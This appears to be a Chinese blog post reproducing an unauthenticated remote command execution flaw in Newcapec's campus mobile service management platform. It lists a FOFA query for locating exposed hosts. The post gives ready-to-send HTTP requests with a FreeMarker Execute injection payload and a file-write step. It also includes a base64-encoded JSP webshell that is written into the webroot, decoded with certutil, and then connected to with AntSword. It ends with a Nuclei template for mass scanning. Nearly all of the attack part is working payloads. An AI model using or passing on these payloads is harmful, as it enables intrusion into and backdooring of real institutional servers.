上海800做网站,wordpress建站的好处,c 还可以做网站,开发网站 语言文章目录 新开普掌上校园服务管理平台service.action RCE漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 新开普掌上校园服务管理平台service.action RCE漏洞复现 [附POC]
0x01 前言
免责声明#xff1a;请勿… 文章目录 新开普掌上校园服务管理平台service.action RCE漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 新开普掌上校园服务管理平台service.action RCE漏洞复现 [附POC]
0x01 前言
免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用
0x02 漏洞描述
新开普掌上校园服务管理平台service.action接口处存在远程命令执行漏洞攻击者可在未经身份认证的情况下调用后台接口执行恶意系统命令。
0x03 影响版本
新开普掌上校园服务管理平台0x04 漏洞环境
FOFA语法title“掌上校园服务管理平台”
0x05 漏洞复现
1.访问漏洞环境 2.构造POC
POC POST
POST /service_transport/service.action HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Cookie: JSESSIONID6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1{command: GetFZinfo,UnitCode: #assign ex \freemarker.template.utility.Execute\?new()${ex(\cmd /c 执行的命令\)}3.复现
访问http://ip:port/service_transport/service.action,出现如下结果说明漏洞存在 执行ping命令
1.发送执行ping命令的数据包并配合dnslog查看回显此漏洞命令执行无回显 2.查看dnslog是否有回显 有回显ping命令成功执行。
写入文件
使用echo写入12345678到ser.txt文件中
POST /service_transport/service.action HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Cookie: JSESSIONID6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1{command: GetFZinfo,UnitCode: #assign ex \freemarker.template.utility.Execute\?new()${ex(\cmd /c echo 12345678 ./webapps/ROOT/ser.txt\)}
}访问写入的ser.txt文件是否写入成功。
GET /ser.txt HTTP/1.1
Host: ip:port
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Connection: close
Cookie: JSESSIONID6A13B163B0FA9A5F8FE53D4153AC13A4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0有回显写入的12345678文件成功写入
深度利用 既然可以写入文件尝试写入jsp木马。
第一步写入jsp的木马 首先对jsp马进行base64编码
POST /service_transport/service.action HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Cookie: JSESSIONID6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1{command: GetFZinfo,UnitCode: #assign ex \freemarker.template.utility.Execute\?new()${ex(\cmd /c echo PCUhCiAgICBjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXIgewogICAgICAgIFUoQ2xhc3NMb2FkZXIgYykgewogICAgICAgICAgICBzdXBlcihjKTsKICAgICAgICB9CiAgICAgICAgcHVibGljIENsYXNzIGcoYnl0ZVtdIGIpIHsKICAgICAgICAgICAgcmV0dXJuIHN1cGVyLmRlZmluZUNsYXNzKGIsIDAsIGIubGVuZ3RoKTsKICAgICAgICB9CiAgICB9CiAKICAgIHB1YmxpYyBieXRlW10gYmFzZTY0RGVjb2RlKFN0cmluZyBzdHIpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgic3VuLm1pc2MuQkFTRTY0RGVjb2RlciIpOwogICAgICAgICAgICByZXR1cm4gKGJ5dGVbXSkgY2xhenouZ2V0TWV0aG9kKCJkZWNvZGVCdWZmZXIiLCBTdHJpbmcuY2xhc3MpLmludm9rZShjbGF6ei5uZXdJbnN0YW5jZSgpLCBzdHIpOwogICAgICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7CiAgICAgICAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkJhc2U2NCIpOwogICAgICAgICAgICBPYmplY3QgZGVjb2RlciA9IGNsYXp6LmdldE1ldGhvZCgiZ2V0RGVjb2RlciIpLmludm9rZShudWxsKTsKICAgICAgICAgICAgcmV0dXJuIChieXRlW10pIGRlY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImRlY29kZSIsIFN0cmluZy5jbGFzcykuaW52b2tlKGRlY29kZXIsIHN0cik7CiAgICAgICAgfQogICAgfQolPgo8JQogICAgU3RyaW5nIGNscyA9IHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJ5aXFpdGlhb3d1YmEiKTsKICAgIGlmIChjbHMgIT0gbnVsbCkgewogICAgICAgIG5ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKGJhc2U2NERlY29kZShjbHMpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7CiAgICB9CiU ./webapps/ROOT/Aaction.txt\)}
}第二步使用certutil命令将文件解码并转换为jsp文件
POST /service_transport/service.action HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Cookie: JSESSIONID6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1{command: GetFZinfo,UnitCode: #assign ex \freemarker.template.utility.Execute\?new()${ex(\cmd /c certutil -decode ./webapps/ROOT/Aaction.txt ./webapps/ROOT/qAaction.jsp\)}
}第三步 蚁剑连接http://your-ip/qAaction.jsp
Nuclei POC
id: newcapec-CampusMobileServiceManagementPlatform-RCE
info:name: 新开普掌上校园服务管理平台service.action远程命令执行漏洞author: fgzseverity: highdescription: 新开普掌上校园服务管理平台/service_transport/service.action接口处存在远程命令执行漏洞攻击者可在未经身份认证的情况下调用后台接口执行恶意系统命令。tags: 2023,xinkaipu,rcemetadata:max-request: 3fofa-query: title掌上校园服务管理平台verified: truehttp:- raw:- |POST /service_transport/service.action HTTP/1.1Host: {{Hostname}}Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2Cookie: JSESSIONID6A13B163B0FA9A5F8FE53D4153AC13A4Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0{command: GetFZinfo,UnitCode: #assign ex \freemarker.template.utility.Execute\?new()${ex(\cmd /c echo {{randstr}} ./webapps/ROOT/{{randstr}}.txt\)}}- |GET /{{randstr}}.txt HTTP/1.1Host: {{Hostname}}matchers:- type: dsldsl:- status_code_2 200 contains(body_2, {{randstr}})用法
nuclei.exe -t newcapec-CampusMobileServiceManagementPlatform-RCE.yaml -l urls.txt
